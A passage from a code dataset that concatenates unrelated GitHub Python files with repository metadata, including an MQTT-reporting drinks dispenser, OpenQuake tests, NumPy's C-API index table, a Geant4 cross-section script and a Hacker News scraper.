publish.single(\"pub/tank-1\", \"HIGH\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.HIGH)\n GPIO.output(yellow, GPIO.LOW)\n return \"HIGH\"\n elif(distance > 3.4 and distance < 4.2):\n print(\"Drinks capacity : MID\")\n publish.single(\"pub/tank-1\", \"MID\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.HIGH)\n GPIO.output(yellow, GPIO.LOW)\n return \"MID\"\n elif(distance >= 4.2 and distance < 4.8):\n print(\"Drinks capacity : LOW\")\n publish.single(\"pub/tank-1\", \"LOW\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.LOW)\n GPIO.output(yellow, GPIO.HIGH)\n return \"LOW\"\n elif(distance >= 4.8 and distance < 7):\n print(\"Drinks capacity : EMPTY\")\n publish.single(\"pub/tank-1\", \"EMPTY\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.LOW)\n GPIO.output(yellow, GPIO.HIGH)\n return \"EMPTY\"\n \ndef checkCup(delay):\n i = 0\n while i < delay:\n GPIO.output(TRIG2, False)\n time.sleep(refreshTime)\n GPIO.output(TRIG2, True)\n time.sleep(0.00001)\n GPIO.output(TRIG2, False)\n\n while GPIO.input(ECHO2)==0:\n pulse_start = time.time()\n\n while GPIO.input(ECHO2)==1:\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration * 17150\n distance = round(distance, 1)\n #print(distance)\n\n i += 1\n\n if(distance >= 3.3 and distance <= 6):\n print(\"Cup placement : CORRECT\")\n #publish.single(\"pub/tank-1\", \"HIGH\", hostname=\"broker.emqx.io\")\n GPIO.output(red, GPIO.LOW)\n return \"CORRECT\"\n else:\n print(\"Cup placement : INCORRECT\")\n #publish.single(\"pub/tank-1\", \"HIGH\", hostname=\"broker.emqx.io\")\n GPIO.output(red, GPIO.HIGH)\n return \"INCORRECT\"\n\n# Create an MQTT client and attach our routines to it.\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect(\"broker.emqx.io\", 1883, 60)\nclient.loop_forever()\n\nGPIO.cleanup()\n","repo_name":"denxwan/SIT210-ProjectFiles","sub_path":"smartDrinksDispenser/smartDrinksDispenser.py","file_name":"smartDrinksDispenser.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"10839372890","text":"\nimport unittest\n\nfrom openquake.man.single.areas import _get_area, get_rates_density\n\nfrom shapely.wkt import loads\n\nfrom openquake.hazardlib.source import AreaSource\nfrom openquake.hazardlib.mfd import TruncatedGRMFD\nfrom openquake.hazardlib.scalerel.wc1994 import WC1994\nfrom openquake.hazardlib.tom import PoissonTOM\nfrom openquake.hazardlib.geo import Point, Polygon\nfrom openquake.hazardlib.geo.nodalplane import NodalPlane\nfrom openquake.hazardlib.pmf import PMF\n\n\nclass TestGetArea(unittest.TestCase):\n\n def setUp(self):\n self.pol = Polygon([Point(longitude=0.0, latitude=0.0),\n Point(longitude=1.0, latitude=0.0),\n Point(longitude=1.0, latitude=1.0),\n Point(longitude=0.0, latitude=1.0)])\n\n def test01(self):\n # Initial approximated value obtained by roughly multiplying the lenght\n # of one degree of longitude time one degree of latitude\n expected = 12308.236750903827\n computed = _get_area(loads(self.pol.wkt))\n self.assertEqual(expected, computed)\n\n\nclass TestAreaSourceDensity(unittest.TestCase):\n\n def setUp(self):\n\n mfd = TruncatedGRMFD(min_mag=4.0, max_mag=6.0, bin_width=0.1,\n a_val=2.0, b_val=1.0)\n msr = WC1994()\n tom = PoissonTOM(1.0)\n pol = Polygon([Point(longitude=0.0, latitude=0.0),\n Point(longitude=1.0, latitude=0.0),\n Point(longitude=1.0, latitude=1.0),\n Point(longitude=0.0, latitude=1.0)])\n npd = PMF([(1.0, NodalPlane(0.0, 90.0, 0.0))])\n hpd = PMF([(0.7, 10.), (0.3, 20.0)])\n\n self.src1 = AreaSource(source_id='1',\n name='1',\n tectonic_region_type='Test',\n mfd=mfd,\n rupture_mesh_spacing=1,\n magnitude_scaling_relationship=msr,\n rupture_aspect_ratio=1.,\n temporal_occurrence_model=tom,\n upper_seismogenic_depth=0,\n lower_seismogenic_depth=100.,\n nodal_plane_distribution=npd,\n hypocenter_distribution=hpd,\n polygon=pol,\n area_discretization=10.)\n\n def test01(self):\n # Initial value obtained by dividing the rate by the area\n # 10**(a-bmt)-10**(a-bmu) / area\n expected = 1.7567728862622177e-08\n computed = get_rates_density([self.src1], mmint=5.5)\n self.assertEqual(expected, computed['1'])\n","repo_name":"GEMScienceTools/oq-man","sub_path":"openquake/man/tests/single/area_test.py","file_name":"area_test.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23836177758","text":"materias = ['Matematica', 'Física', 'Educación fisica', 'Arte', 'Historia']\nn = 0\n\nwhile n<5:\n print( materias[n])\n nota = int(input('Ingrese la nota: '))\n if nota < 6:\n print('Desaprobado')\n else:\n print('Aprobado')\n n = n + 1\n print('')","repo_name":"Malco90/Clases-Python","sub_path":"notas.py","file_name":"notas.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43481497999","text":"\"\"\"Here we define the exported functions, types, etc... which need to be\nexported through a global C pointer.\n\nEach dictionary contains name -> index pair.\n\nWhenever you change one index, you break the ABI (and the ABI version number\nshould be incremented). 
Whenever you add an item to one of the dict, the API\nneeds to be updated in both numpy/core/meson.build and by adding an appropriate\nentry to cversion.txt (generate the hash via \"python cversions.py\").\n\nWhen adding a function, make sure to use the next integer not used as an index\n(in case you use an existing index or jump, the build will stop and raise an\nexception, so it should hopefully not get unnoticed).\n\n\"\"\"\n\nimport os\nimport importlib.util\n\n\ndef get_annotations():\n # Convoluted because we can't import from numpy.distutils\n # (numpy is not yet built)\n genapi_py = os.path.join(os.path.dirname(__file__), 'genapi.py')\n spec = importlib.util.spec_from_file_location('conv_template', genapi_py)\n mod = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(mod)\n return mod.StealRef, mod.MinVersion\n\n\nStealRef, MinVersion = get_annotations()\n#from code_generators.genapi import StealRef\n\n# index, type\nmultiarray_global_vars = {\n 'NPY_NUMUSERTYPES': (7, 'int'),\n 'NPY_DEFAULT_ASSIGN_CASTING': (292, 'NPY_CASTING'),\n 'PyDataMem_DefaultHandler': (306, 'PyObject*'),\n}\n\nmultiarray_scalar_bool_values = {\n '_PyArrayScalar_BoolValues': (9,)\n}\n\n# index, annotations\n# please mark functions that have been checked to not need any annotations\nmultiarray_types_api = {\n 'PyBigArray_Type': (1,),\n 'PyArray_Type': (2,),\n # Internally, PyArrayDescr_Type is a PyArray_DTypeMeta,\n # the following also defines PyArrayDescr_TypeFull (Full appended)\n 'PyArrayDescr_Type': (3, \"PyArray_DTypeMeta\"),\n 'PyArrayFlags_Type': (4,),\n 'PyArrayIter_Type': (5,),\n 'PyArrayMultiIter_Type': (6,),\n 'PyBoolArrType_Type': (8,),\n 'PyGenericArrType_Type': (10,),\n 'PyNumberArrType_Type': (11,),\n 'PyIntegerArrType_Type': (12,),\n 'PySignedIntegerArrType_Type': (13,),\n 'PyUnsignedIntegerArrType_Type': (14,),\n 'PyInexactArrType_Type': (15,),\n 'PyFloatingArrType_Type': (16,),\n 'PyComplexFloatingArrType_Type': (17,),\n 'PyFlexibleArrType_Type': (18,),\n 'PyCharacterArrType_Type': (19,),\n 'PyByteArrType_Type': (20,),\n 'PyShortArrType_Type': (21,),\n 'PyIntArrType_Type': (22,),\n 'PyLongArrType_Type': (23,),\n 'PyLongLongArrType_Type': (24,),\n 'PyUByteArrType_Type': (25,),\n 'PyUShortArrType_Type': (26,),\n 'PyUIntArrType_Type': (27,),\n 'PyULongArrType_Type': (28,),\n 'PyULongLongArrType_Type': (29,),\n 'PyFloatArrType_Type': (30,),\n 'PyDoubleArrType_Type': (31,),\n 'PyLongDoubleArrType_Type': (32,),\n 'PyCFloatArrType_Type': (33,),\n 'PyCDoubleArrType_Type': (34,),\n 'PyCLongDoubleArrType_Type': (35,),\n 'PyObjectArrType_Type': (36,),\n 'PyStringArrType_Type': (37,),\n 'PyUnicodeArrType_Type': (38,),\n 'PyVoidArrType_Type': (39,),\n # End 1.5 API\n 'PyTimeIntegerArrType_Type': (214,),\n 'PyDatetimeArrType_Type': (215,),\n 'PyTimedeltaArrType_Type': (216,),\n 'PyHalfArrType_Type': (217,),\n 'NpyIter_Type': (218,),\n # End 1.6 API\n}\n\n# define NPY_NUMUSERTYPES (*(int *)PyArray_API[6])\n# define PyBoolArrType_Type (*(PyTypeObject *)PyArray_API[7])\n# define _PyArrayScalar_BoolValues ((PyBoolScalarObject *)PyArray_API[8])\n\nmultiarray_funcs_api = {\n '__unused_indices__': [\n 40, 41, 65, 67, 68, 163, 164, 171, 201, 202, 278, 291],\n 'PyArray_GetNDArrayCVersion': (0,),\n # Unused slot 40, was `PyArray_SetNumericOps`\n # Unused slot 41, was `PyArray_GetNumericOps`,\n 'PyArray_INCREF': (42,),\n 'PyArray_XDECREF': (43,),\n 'PyArray_SetStringFunction': (44,),\n 'PyArray_DescrFromType': (45,),\n 'PyArray_TypeObjectFromType': (46,),\n 'PyArray_Zero': (47,),\n 'PyArray_One': 
(48,),\n 'PyArray_CastToType': (49, StealRef(2)),\n 'PyArray_CastTo': (50,),\n 'PyArray_CastAnyTo': (51,),\n 'PyArray_CanCastSafely': (52,),\n 'PyArray_CanCastTo': (53,),\n 'PyArray_ObjectType': (54,),\n 'PyArray_DescrFromObject': (55,),\n 'PyArray_ConvertToCommonType': (56,),\n 'PyArray_DescrFromScalar': (57,),\n 'PyArray_DescrFromTypeObject': (58,),\n 'PyArray_Size': (59,),\n 'PyArray_Scalar': (60,),\n 'PyArray_FromScalar': (61, StealRef(2)),\n 'PyArray_ScalarAsCtype': (62,),\n 'PyArray_CastScalarToCtype': (63,),\n 'PyArray_CastScalarDirect': (64,),\n # Unused slot 65, was `PyArray_ScalarFromObject`\n 'PyArray_GetCastFunc': (66,),\n # Unused slot 67, was `PyArray_FromDims`\n # Unused slot 68, was `PyArray_FromDimsAndDataAndDescr`\n 'PyArray_FromAny': (69, StealRef(2)),\n 'PyArray_EnsureArray': (70, StealRef(1)),\n 'PyArray_EnsureAnyArray': (71, StealRef(1)),\n 'PyArray_FromFile': (72,),\n 'PyArray_FromString': (73,),\n 'PyArray_FromBuffer': (74,),\n 'PyArray_FromIter': (75, StealRef(2)),\n 'PyArray_Return': (76, StealRef(1)),\n 'PyArray_GetField': (77, StealRef(2)),\n 'PyArray_SetField': (78, StealRef(2)),\n 'PyArray_Byteswap': (79,),\n 'PyArray_Resize': (80,),\n 'PyArray_MoveInto': (81,),\n 'PyArray_CopyInto': (82,),\n 'PyArray_CopyAnyInto': (83,),\n 'PyArray_CopyObject': (84,),\n 'PyArray_NewCopy': (85,),\n 'PyArray_ToList': (86,),\n 'PyArray_ToString': (87,),\n 'PyArray_ToFile': (88,),\n 'PyArray_Dump': (89,),\n 'PyArray_Dumps': (90,),\n 'PyArray_ValidType': (91,),\n 'PyArray_UpdateFlags': (92,),\n 'PyArray_New': (93,),\n 'PyArray_NewFromDescr': (94, StealRef(2)),\n 'PyArray_DescrNew': (95,),\n 'PyArray_DescrNewFromType': (96,),\n 'PyArray_GetPriority': (97,),\n 'PyArray_IterNew': (98,),\n 'PyArray_MultiIterNew': (99,),\n 'PyArray_PyIntAsInt': (100,),\n 'PyArray_PyIntAsIntp': (101,),\n 'PyArray_Broadcast': (102,),\n 'PyArray_FillObjectArray': (103,),\n 'PyArray_FillWithScalar': (104,),\n 'PyArray_CheckStrides': (105,),\n 'PyArray_DescrNewByteorder': (106,),\n 'PyArray_IterAllButAxis': (107,),\n 'PyArray_CheckFromAny': (108, StealRef(2)),\n 'PyArray_FromArray': (109, StealRef(2)),\n 'PyArray_FromInterface': (110,),\n 'PyArray_FromStructInterface': (111,),\n 'PyArray_FromArrayAttr': (112,),\n 'PyArray_ScalarKind': (113,),\n 'PyArray_CanCoerceScalar': (114,),\n 'PyArray_NewFlagsObject': (115,),\n 'PyArray_CanCastScalar': (116,),\n 'PyArray_CompareUCS4': (117,),\n 'PyArray_RemoveSmallest': (118,),\n 'PyArray_ElementStrides': (119,),\n 'PyArray_Item_INCREF': (120,),\n 'PyArray_Item_XDECREF': (121,),\n 'PyArray_FieldNames': (122,),\n 'PyArray_Transpose': (123,),\n 'PyArray_TakeFrom': (124,),\n 'PyArray_PutTo': (125,),\n 'PyArray_PutMask': (126,),\n 'PyArray_Repeat': (127,),\n 'PyArray_Choose': (128,),\n 'PyArray_Sort': (129,),\n 'PyArray_ArgSort': (130,),\n 'PyArray_SearchSorted': (131,),\n 'PyArray_ArgMax': (132,),\n 'PyArray_ArgMin': (133,),\n 'PyArray_Reshape': (134,),\n 'PyArray_Newshape': (135,),\n 'PyArray_Squeeze': (136,),\n 'PyArray_View': (137, StealRef(2)),\n 'PyArray_SwapAxes': (138,),\n 'PyArray_Max': (139,),\n 'PyArray_Min': (140,),\n 'PyArray_Ptp': (141,),\n 'PyArray_Mean': (142,),\n 'PyArray_Trace': (143,),\n 'PyArray_Diagonal': (144,),\n 'PyArray_Clip': (145,),\n 'PyArray_Conjugate': (146,),\n 'PyArray_Nonzero': (147,),\n 'PyArray_Std': (148,),\n 'PyArray_Sum': (149,),\n 'PyArray_CumSum': (150,),\n 'PyArray_Prod': (151,),\n 'PyArray_CumProd': (152,),\n 'PyArray_All': (153,),\n 'PyArray_Any': (154,),\n 'PyArray_Compress': (155,),\n 'PyArray_Flatten': (156,),\n 
'PyArray_Ravel': (157,),\n 'PyArray_MultiplyList': (158,),\n 'PyArray_MultiplyIntList': (159,),\n 'PyArray_GetPtr': (160,),\n 'PyArray_CompareLists': (161,),\n 'PyArray_AsCArray': (162, StealRef(5)),\n # Unused slot 163, was `PyArray_As1D`\n # Unused slot 164, was `PyArray_As2D`\n 'PyArray_Free': (165,),\n 'PyArray_Converter': (166,),\n 'PyArray_IntpFromSequence': (167,),\n 'PyArray_Concatenate': (168,),\n 'PyArray_InnerProduct': (169,),\n 'PyArray_MatrixProduct': (170,),\n # Unused slot 171, was `PyArray_CopyAndTranspose`\n 'PyArray_Correlate': (172,),\n 'PyArray_TypestrConvert': (173,),\n 'PyArray_DescrConverter': (174,),\n 'PyArray_DescrConverter2': (175,),\n 'PyArray_IntpConverter': (176,),\n 'PyArray_BufferConverter': (177,),\n 'PyArray_AxisConverter': (178,),\n 'PyArray_BoolConverter': (179,),\n 'PyArray_ByteorderConverter': (180,),\n 'PyArray_OrderConverter': (181,),\n 'PyArray_EquivTypes': (182,),\n 'PyArray_Zeros': (183, StealRef(3)),\n 'PyArray_Empty': (184, StealRef(3)),\n 'PyArray_Where': (185,),\n 'PyArray_Arange': (186,),\n 'PyArray_ArangeObj': (187,),\n 'PyArray_SortkindConverter': (188,),\n 'PyArray_LexSort': (189,),\n 'PyArray_Round': (190,),\n 'PyArray_EquivTypenums': (191,),\n 'PyArray_RegisterDataType': (192,),\n 'PyArray_RegisterCastFunc': (193,),\n 'PyArray_RegisterCanCast': (194,),\n 'PyArray_InitArrFuncs': (195,),\n 'PyArray_IntTupleFromIntp': (196,),\n 'PyArray_TypeNumFromName': (197,),\n 'PyArray_ClipmodeConverter': (198,),\n 'PyArray_OutputConverter': (199,),\n 'PyArray_BroadcastToShape': (200,),\n # Unused slot 201, was `_PyArray_SigintHandler`\n # Unused slot 202, was `_PyArray_GetSigintBuf`\n 'PyArray_DescrAlignConverter': (203,),\n 'PyArray_DescrAlignConverter2': (204,),\n 'PyArray_SearchsideConverter': (205,),\n 'PyArray_CheckAxis': (206,),\n 'PyArray_OverflowMultiplyList': (207,),\n 'PyArray_CompareString': (208,),\n 'PyArray_MultiIterFromObjects': (209,),\n 'PyArray_GetEndianness': (210,),\n 'PyArray_GetNDArrayCFeatureVersion': (211,),\n 'PyArray_Correlate2': (212,),\n 'PyArray_NeighborhoodIterNew': (213,),\n # End 1.5 API\n 'PyArray_SetDatetimeParseFunction': (219,),\n 'PyArray_DatetimeToDatetimeStruct': (220,),\n 'PyArray_TimedeltaToTimedeltaStruct': (221,),\n 'PyArray_DatetimeStructToDatetime': (222,),\n 'PyArray_TimedeltaStructToTimedelta': (223,),\n # NDIter API\n 'NpyIter_New': (224,),\n 'NpyIter_MultiNew': (225,),\n 'NpyIter_AdvancedNew': (226,),\n 'NpyIter_Copy': (227,),\n 'NpyIter_Deallocate': (228,),\n 'NpyIter_HasDelayedBufAlloc': (229,),\n 'NpyIter_HasExternalLoop': (230,),\n 'NpyIter_EnableExternalLoop': (231,),\n 'NpyIter_GetInnerStrideArray': (232,),\n 'NpyIter_GetInnerLoopSizePtr': (233,),\n 'NpyIter_Reset': (234,),\n 'NpyIter_ResetBasePointers': (235,),\n 'NpyIter_ResetToIterIndexRange': (236,),\n 'NpyIter_GetNDim': (237,),\n 'NpyIter_GetNOp': (238,),\n 'NpyIter_GetIterNext': (239,),\n 'NpyIter_GetIterSize': (240,),\n 'NpyIter_GetIterIndexRange': (241,),\n 'NpyIter_GetIterIndex': (242,),\n 'NpyIter_GotoIterIndex': (243,),\n 'NpyIter_HasMultiIndex': (244,),\n 'NpyIter_GetShape': (245,),\n 'NpyIter_GetGetMultiIndex': (246,),\n 'NpyIter_GotoMultiIndex': (247,),\n 'NpyIter_RemoveMultiIndex': (248,),\n 'NpyIter_HasIndex': (249,),\n 'NpyIter_IsBuffered': (250,),\n 'NpyIter_IsGrowInner': (251,),\n 'NpyIter_GetBufferSize': (252,),\n 'NpyIter_GetIndexPtr': (253,),\n 'NpyIter_GotoIndex': (254,),\n 'NpyIter_GetDataPtrArray': (255,),\n 'NpyIter_GetDescrArray': (256,),\n 'NpyIter_GetOperandArray': (257,),\n 'NpyIter_GetIterView': (258,),\n 
'NpyIter_GetReadFlags': (259,),\n 'NpyIter_GetWriteFlags': (260,),\n 'NpyIter_DebugPrint': (261,),\n 'NpyIter_IterationNeedsAPI': (262,),\n 'NpyIter_GetInnerFixedStrideArray': (263,),\n 'NpyIter_RemoveAxis': (264,),\n 'NpyIter_GetAxisStrideArray': (265,),\n 'NpyIter_RequiresBuffering': (266,),\n 'NpyIter_GetInitialDataPtrArray': (267,),\n 'NpyIter_CreateCompatibleStrides': (268,),\n #\n 'PyArray_CastingConverter': (269,),\n 'PyArray_CountNonzero': (270,),\n 'PyArray_PromoteTypes': (271,),\n 'PyArray_MinScalarType': (272,),\n 'PyArray_ResultType': (273,),\n 'PyArray_CanCastArrayTo': (274,),\n 'PyArray_CanCastTypeTo': (275,),\n 'PyArray_EinsteinSum': (276,),\n 'PyArray_NewLikeArray': (277, StealRef(3)),\n # Unused slot 278, was `PyArray_GetArrayParamsFromObject`\n 'PyArray_ConvertClipmodeSequence': (279,),\n 'PyArray_MatrixProduct2': (280,),\n # End 1.6 API\n 'NpyIter_IsFirstVisit': (281,),\n 'PyArray_SetBaseObject': (282, StealRef(2)),\n 'PyArray_CreateSortedStridePerm': (283,),\n 'PyArray_RemoveAxesInPlace': (284,),\n 'PyArray_DebugPrint': (285,),\n 'PyArray_FailUnlessWriteable': (286,),\n 'PyArray_SetUpdateIfCopyBase': (287, StealRef(2)),\n 'PyDataMem_NEW': (288,),\n 'PyDataMem_FREE': (289,),\n 'PyDataMem_RENEW': (290,),\n # Unused slot 291, was `PyDataMem_SetEventHook`\n 'PyArray_MapIterSwapAxes': (293,),\n 'PyArray_MapIterArray': (294,),\n 'PyArray_MapIterNext': (295,),\n # End 1.7 API\n 'PyArray_Partition': (296,),\n 'PyArray_ArgPartition': (297,),\n 'PyArray_SelectkindConverter': (298,),\n 'PyDataMem_NEW_ZEROED': (299,),\n # End 1.8 API\n # End 1.9 API\n 'PyArray_CheckAnyScalarExact': (300,),\n # End 1.10 API\n 'PyArray_MapIterArrayCopyIfOverlap': (301,),\n # End 1.13 API\n 'PyArray_ResolveWritebackIfCopy': (302,),\n 'PyArray_SetWritebackIfCopyBase': (303,),\n # End 1.14 API\n 'PyDataMem_SetHandler': (304, MinVersion(\"1.22\")),\n 'PyDataMem_GetHandler': (305, MinVersion(\"1.22\")),\n # End 1.22 API\n 'NpyDatetime_ConvertDatetime64ToDatetimeStruct': (307, MinVersion(\"2.0\")),\n 'NpyDatetime_ConvertDatetimeStructToDatetime64': (308, MinVersion(\"2.0\")),\n 'NpyDatetime_ConvertPyDateTimeToDatetimeStruct': (309, MinVersion(\"2.0\")),\n 'NpyDatetime_GetDatetimeISO8601StrLen': (310, MinVersion(\"2.0\")),\n 'NpyDatetime_MakeISO8601Datetime': (311, MinVersion(\"2.0\")),\n 'NpyDatetime_ParseISO8601Datetime': (312, MinVersion(\"2.0\")),\n}\n\nufunc_types_api = {\n 'PyUFunc_Type': (0,)\n}\n\nufunc_funcs_api = {\n '__unused_indices__': [3, 25, 26, 29, 32],\n 'PyUFunc_FromFuncAndData': (1,),\n 'PyUFunc_RegisterLoopForType': (2,),\n # Unused slot 3, was `PyUFunc_GenericFunction`\n 'PyUFunc_f_f_As_d_d': (4,),\n 'PyUFunc_d_d': (5,),\n 'PyUFunc_f_f': (6,),\n 'PyUFunc_g_g': (7,),\n 'PyUFunc_F_F_As_D_D': (8,),\n 'PyUFunc_F_F': (9,),\n 'PyUFunc_D_D': (10,),\n 'PyUFunc_G_G': (11,),\n 'PyUFunc_O_O': (12,),\n 'PyUFunc_ff_f_As_dd_d': (13,),\n 'PyUFunc_ff_f': (14,),\n 'PyUFunc_dd_d': (15,),\n 'PyUFunc_gg_g': (16,),\n 'PyUFunc_FF_F_As_DD_D': (17,),\n 'PyUFunc_DD_D': (18,),\n 'PyUFunc_FF_F': (19,),\n 'PyUFunc_GG_G': (20,),\n 'PyUFunc_OO_O': (21,),\n 'PyUFunc_O_O_method': (22,),\n 'PyUFunc_OO_O_method': (23,),\n 'PyUFunc_On_Om': (24,),\n # Unused slot 25, was `PyUFunc_GetPyValues`\n # Unused slot 26, was `PyUFunc_checkfperr`\n 'PyUFunc_clearfperr': (27,),\n 'PyUFunc_getfperr': (28,),\n # Unused slot 29, was `PyUFunc_handlefperr`\n 'PyUFunc_ReplaceLoopBySignature': (30,),\n 'PyUFunc_FromFuncAndDataAndSignature': (31,),\n # Unused slot 32, was `PyUFunc_SetUsesArraysAsData`\n # End 1.5 API\n 'PyUFunc_e_e': 
(33,),\n 'PyUFunc_e_e_As_f_f': (34,),\n 'PyUFunc_e_e_As_d_d': (35,),\n 'PyUFunc_ee_e': (36,),\n 'PyUFunc_ee_e_As_ff_f': (37,),\n 'PyUFunc_ee_e_As_dd_d': (38,),\n # End 1.6 API\n 'PyUFunc_DefaultTypeResolver': (39,),\n 'PyUFunc_ValidateCasting': (40,),\n # End 1.7 API\n 'PyUFunc_RegisterLoopForDescr': (41,),\n # End 1.8 API\n 'PyUFunc_FromFuncAndDataAndSignatureAndIdentity': (42, MinVersion(\"1.16\")),\n # End 1.16 API\n}\n\n# List of all the dicts which define the C API\n# XXX: DO NOT CHANGE THE ORDER OF TUPLES BELOW !\nmultiarray_api = (\n multiarray_global_vars,\n multiarray_scalar_bool_values,\n multiarray_types_api,\n multiarray_funcs_api,\n)\n\nufunc_api = (\n ufunc_funcs_api,\n ufunc_types_api\n)\n\nfull_api = multiarray_api + ufunc_api\n","repo_name":"numpy/numpy","sub_path":"numpy/_core/code_generators/numpy_api.py","file_name":"numpy_api.py","file_ext":"py","file_size_in_byte":21385,"program_lang":"python","lang":"en","doc_type":"code","stars":25041,"dataset":"github-code","pt":"66"} +{"seq_id":"14054640976","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport importlib\n\nimport constants as const\nimport indexes\nimport grid\nfrom functions import MC_functions as mcf\n\nconst = importlib.reload(const)\ngrid = importlib.reload(grid)\nmcf = importlib.reload(mcf)\nindexes = importlib.reload(indexes)\n\n# G4MicroElecSiStructure::G4MicroElecSiStructure(): nLevels(6)\n# {\n# energyConstant.push_back(16.65*eV);\n# energyConstant.push_back(6.52*eV);\n# energyConstant.push_back(13.63*eV);\n# energyConstant.push_back(107.98*eV);\n# energyConstant.push_back(151.55*eV);\n# energyConstant.push_back(1828.5*eV);\n#\n# nLevels = energyConstant.size();\n# }\n\nE_bind = [16.65, 6.52, 13.63, 107.98, 151.55, 1828.5]\n\n# %%\nEE = grid.EE\n\ndiff_arr = np.loadtxt(\n '/Users/fedor/PycharmProjects/MC_simulation/notebooks/MuElec/microelec/sigmadiff_cumulated_inelastic_e_Si.dat')\ndiff_arr = diff_arr[np.where(diff_arr[:, 0] <= 30e+3)] # cut higher energies\n\ndiff_arr[np.where(diff_arr == 2)] = 1\n\nEE_unique = np.unique(diff_arr[:, 0])\ndiff_sigma_pre = np.zeros((6, len(EE_unique), len(grid.EE)))\n\n# %%\nhw_list = []\ndiff_arr_list = []\n\nfor n in range(6):\n for i, E in enumerate(EE_unique):\n inds = np.where(diff_arr[:, 0] == E)[0]\n hw = diff_arr[inds, 1]\n now_diff_arr = diff_arr[inds, n + 2]\n\n if np.max(now_diff_arr) == 0:\n continue\n\n hw_list.append(hw)\n diff_arr_list.append(now_diff_arr)\n\n now_arr = np.zeros(len(grid.EE))\n\n ind_beg = np.where(grid.EE > E_bind[n])[0][0] + 1\n now_arr[:ind_beg] = 0\n\n if len(np.where(grid.EE > hw[-1])[0]) > 0:\n ind_end = np.where(grid.EE > hw[-1])[0][0]\n now_arr[ind_end:] = 1\n now_arr[ind_beg:ind_end] = mcf.log_lin_interp(hw, now_diff_arr)(grid.EE[ind_beg:ind_end])\n\n else:\n now_arr[ind_beg:] = mcf.log_lin_interp(hw, now_diff_arr)(grid.EE[ind_beg:])\n\n diff_sigma_pre[n, i, :] = now_arr\n\n\nfor n in range(6):\n diff_sigma_pre[n, 0, :] = diff_sigma_pre[n, 1, :]\n\n# %%\ndiff_sigma_cumulated = np.zeros((6, len(grid.EE), len(grid.EE)))\n\nfor n in range(6):\n for j in range(len(grid.EE)):\n diff_sigma_cumulated[n, indexes.Si_E_cut_ind:, j] =\\\n mcf.log_lin_interp(EE_unique, diff_sigma_pre[n, :, j])(grid.EE[indexes.Si_E_cut_ind:])\n\n# %%\ndiff_sigma_cumulated[0, 278:294, :] = diff_sigma_cumulated[0, 294, :]\n\n# %%\nplt.figure(dpi=300)\nplt.imshow(np.log(diff_sigma_cumulated[5, :, :]))\nplt.show()\n\n# %%\n# inds_pre = list(range(3, 48, 7))\n#\n# inds = np.zeros(len(inds_pre), dtype=int)\n#\n# for i in range(len(inds)):\n# inds[i] = 
np.argmin(np.abs(grid.EE - EE_unique[inds_pre[i]]))\n#\n# print(EE_unique[inds_pre])\n# print(grid.EE[inds])\n#\n# plt.figure(dpi=300)\n#\n# for i in range(len(inds)):\n# plt.semilogx(hw_list[inds_pre[i]], diff_arr_list[inds_pre[i]], 'o')\n# plt.semilogx(grid.EE, diff_sigma_cumulated[0, inds[i], :])\n#\n# plt.show()\n\n# %% set extra elements to -2\nfor n in range(6):\n for i in range(len(grid.EE)):\n for j in range(len(grid.EE) - 1):\n\n if diff_sigma_cumulated[n, i, j + 1] == 0 and diff_sigma_cumulated[n, i, j] == 0:\n diff_sigma_cumulated[n, i, j] = 2\n\n if diff_sigma_cumulated[n, i, len(grid.EE) - j - 1] == 1 and\\\n diff_sigma_cumulated[n, i, len(grid.EE) - j - 1 - 1] == 1:\n diff_sigma_cumulated[n, i, len(grid.EE) - j - 1] = 2\n\n# %%\nnp.save('notebooks/MuElec/MuElec_inelastic_arrays/u_diff_cumulated_6.npy', diff_sigma_cumulated)\n\n\n\n","repo_name":"fedorsidorov/MC_simulation","sub_path":"notebooks/_outdated/MuElec/geant4_cumulated_arrays.py","file_name":"geant4_cumulated_arrays.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71896228049","text":"from bs4 import BeautifulSoup\nimport requests\n\ncontents = \"\"\nfor page in range(3):\n response = requests.get(f\"https://news.ycombinator.com/?p={page}\")\n contents += response.text\n\nsoup = BeautifulSoup(contents, \"html.parser\")\n\narticles = soup.select(\".titleline > a\")\nupvote = soup.select(\"td .subtext\")\n\narticle_text =[article.get_text() for article in articles]\narticle_link = [article.get(\"href\") for article in articles]\narticle_upvote = []\n\n\nfor vote in upvote:\n try:\n article_upvote.append(int(vote.select_one(\"span .score\").getText().split()[0]))\n except AttributeError:\n article_upvote.append(0)\n\nprint(article_text, f'\\n{len(article_text)}')\nprint(article_link, f'\\n{len(article_link)}')\nprint(article_upvote, f'\\n{len(article_upvote)}')\n\nindex_highest_score = article_upvote.index(max(article_upvote))\ntitle_most_voted = {article_text[index_highest_score]: [article_link[index_highest_score], article_upvote[index_highest_score]]}\nprint(title_most_voted)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"natalia-gcvs/100_days_of_code_python","sub_path":"day-45-web-scraping-with-beautiful-soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4132635230","text":"from django.db import models\nfrom django.utils import timezone\n\nfrom simple_history.models import HistoricalRecords\n\nfrom edc_constants.constants import UNKNOWN\n\nfrom ..choices import WHO_STAGE, WHO_DEFINING_ILLNESSES\n\nfrom .crf_model_mixin import CrfModelMixin, CrfInlineModelMixin\n\n\nclass WhoStaging(CrfModelMixin):\n\n report_datetime = models.DateTimeField(default=timezone.now, 